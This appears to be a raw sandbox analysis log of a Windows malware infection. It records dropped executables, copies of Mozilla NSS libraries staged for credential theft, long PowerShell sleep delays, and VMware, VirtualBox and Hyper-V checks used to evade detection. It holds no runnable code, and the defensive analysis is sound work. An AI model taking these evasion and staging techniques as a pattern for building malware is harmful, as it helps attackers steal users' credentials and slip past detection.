                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6599
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3117
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1461
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2455
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3881
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 718
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4824
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5930
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\msvcp140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111240101\c70962c806.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\freebl3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\softokn3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\mozglue[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111230101\5ef8bafe70.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111250101\df2fea7261.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10111220101\c105f06ef0.exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nss3[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\vcruntime140[1].dllJump to dropped file
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeJump to dropped file
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeAPI coverage: 3.3 %
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeAPI coverage: 4.2 %
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeAPI coverage: 6.6 %
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -30000s >= -30000sJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1956Thread sleep count: 1047 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1956Thread sleep time: -2095047s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1940Thread sleep count: 959 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1940Thread sleep time: -1918959s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1860Thread sleep count: 272 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1860Thread sleep time: -8160000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1960Thread sleep count: 885 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1960Thread sleep time: -1770885s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 912Thread sleep count: 1834 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 912Thread sleep time: -3669834s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1232Thread sleep count: 1078 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1232Thread sleep time: -2157078s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7464Thread sleep count: 1070 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7464Thread sleep time: -2141070s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7440Thread sleep count: 376 > 30
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7440Thread sleep time: -11280000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 1400Thread sleep time: -360000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 4228Thread sleep time: -180000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7440Thread sleep time: -30000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 664Thread sleep time: -40020s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 4220Thread sleep time: -34017s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe TID: 4252Thread sleep time: -32016s >= -30000s
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe TID: 8072Thread sleep time: -60000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8020Thread sleep time: -52026s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 7460Thread sleep time: -46023s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 7592Thread sleep time: -42021s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8172Thread sleep time: -1122000s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8096Thread sleep time: -58029s >= -30000s
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe TID: 8100Thread sleep time: -54027s >= -30000s
                                                Source: C:\Windows\System32\svchost.exe TID: 6460Thread sleep time: -30000s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6620Thread sleep time: -44022s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 420Thread sleep time: -44022s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 4732Thread sleep time: -48024s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6884Thread sleep time: -60000s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6768Thread sleep time: -46023s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 1492Thread sleep time: -40020s >= -30000s
                                                Source: C:\ProgramData\jnxnee\benskvi.exe TID: 6788Thread sleep time: -48024s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep time: -12912720851596678s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -30000s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -1844674407370954s >= -30000s
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4736Thread sleep time: -9223372036854770s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3240Thread sleep count: 1461 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5188Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1212Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5820Thread sleep count: 2455 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1968Thread sleep count: 477 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -2767011611056431s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5364Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep count: 3881 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep count: 718 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5508Thread sleep time: -3689348814741908s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -4611686018427385s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4380Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180Thread sleep count: 5930 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -11068046444225724s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 147 > 30
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -30000s >= -30000s
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000s
                                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                                Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                                                Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeLast function: Thread delayed
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeLast function: Thread delayed
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeLast function: Thread delayed
                                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile Volume queried: C:\ FullSizeInformation
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DBBE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C4C2A2 FindFirstFileExW,0_2_00C4C2A2
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C868EE FindFirstFileW,FindClose,0_2_00C868EE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C8698F
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D076
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D3A9
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C89642
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C8979D
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C89B2B
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C85C97
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BEF011 FindFirstFileExW,20_2_00BEF011
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CEF011 FindFirstFileExW,21_2_00CEF011
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeThread delayed: delay time: 30000
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeThread delayed: delay time: 180000
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeThread delayed: delay time: 180000
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeThread delayed: delay time: 30000
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeThread delayed: delay time: 60000
                                                Source: C:\ProgramData\jnxnee\benskvi.exeThread delayed: delay time: 60000
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\AppData\Local\Temp
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\AppData
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\AppData\Local
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeFile opened: C:\Users\user\Documents\desktop.ini
                                                Source: powershell.exe, 00000009.00000002.1466076584.000001DDD56AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
                                                Source: rapes.exe, rapes.exe, 0000000D.00000002.1443703711.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457153178.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, ILqcVeT.exe, 00000017.00000002.2388746724.00000000013AB000.00000040.00000001.01000000.00000013.sdmp, vertualiziren.exe, 00000018.00000002.2029919575.000000000058F000.00000040.00000001.01000000.00000014.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2197219024.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2294686273.0000000000359000.00000040.00000001.01000000.0000001A.sdmp, 7dbaa342f5.exe, 0000003E.00000002.2520912496.0000000000A5F000.00000040.00000001.01000000.0000001B.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                                                Source: powershell.exe, 00000006.00000002.1355470671.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ya
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000003.1381343566.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                                Source: powershell.exe, 00000006.00000002.1370376809.00000000070E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
                                                Source: ILqcVeT.exe, 00000017.00000002.2519962520.000000000BA82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                                                Source: powershell.exe, 00000006.00000002.1370376809.00000000070E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6%
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                                Source: mshta.exe, 00000040.00000003.2286459077.0000000002758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                                Source: mshta.exe, 00000004.00000003.1316421791.000000000315D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\kAZ
                                                Source: mshta.exe, 00000004.00000002.1324902042.0000000003167000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.A[
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn9=
                                                Source: powershell.exe, 0000003A.00000002.2403168393.0000000007709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                                Source: mshta.exe, 00000004.00000003.1316421791.000000000315D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
                                                Source: mshta.exe, 0000003C.00000003.2398840479.000001BBF89FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\o~J
                                                Source: powershell.exe, 0000003A.00000002.2415061821.0000000007791000.00000004.00000020.00020000.00000000.sdmp, 7dbaa342f5.exe, 0000003E.00000002.2552200343.0000000001312000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2548889037.000000000714D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                                Source: powershell.exe, 00000023.00000002.2188885216.0000000007AE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77
                                                Source: nhDLtPT.exe, 00000014.00000003.1882424436.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X7
